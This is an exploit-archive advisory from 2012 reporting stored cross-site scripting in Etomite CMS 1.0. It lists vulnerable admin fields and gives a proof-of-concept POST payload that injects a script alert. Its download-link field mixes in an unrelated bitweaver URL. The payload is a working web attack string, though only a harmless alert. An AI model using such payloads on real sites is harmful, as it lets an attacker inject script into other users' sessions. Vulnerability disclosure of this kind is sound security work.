Home / exploits Etomite CMS 1.0 Cross Site Scripting
Posted on 22 June 2012
____/\______.__ ________ _________ _____ ____/\__ ____/\__ _____ ____/\__ ____/\______ / / /_/_ | | \_____ ___\______ / ___ / / /_// / /_/ / ___ / / /_// / /_/_ | ____ \__/ / | | | _(__ < / / / / / ._ \__/ / \__/ / / / ._ \__/ / \__/ / | |/ / / / | | |__/ | / / < \_____/ / / / / / < \_____/ / / / / / | | | /_/ /__ /|___|____/______ /___| /____/ \_____/_/ /__ /_/ /__ /\_____/_/ /__ /_/ /__ /|___|___| / / / / / / / / / / / / / / ------------------------------------------------------------------------------ ------------------------------------------------------------------- TITLE: Etomite CMS Multiple stored XSS Vendor: Etomite CMS Author: $1l3n7 @$$@$$17 Email: sil3ntb0t@gmail.com Download Link: <https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download>http://www.etomite.com/files/file/323-etomite-11/ Versions: 1.0 Tested on: Windows7 ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ DEMO: A)Persistent XSS http://localhost/etomite/manager/index.php DEMO: http://localhost/etomite/manager/index.php New Document, New Weblink, Messages(subject and content), New keyword(manage resources) No of log entries,no of messages and many more fields are vulnerable to stored XSS. POST DATA= "'-->><script>alert(/xss/)</script> Eg: 1: In Manage Resource in keyword tab, 'create new keyword' field POST DATA= "'-->><script>alert(0)</script> 2: Similarly 'New Template' field http://localhost/etomite/manager/index.php POST DATA= "'-->><script>alert(/xss/)</script> ---------------------------------------------------------------------------- gr33t1ngs and ShOuTZ to r007k17-w and all my friends..
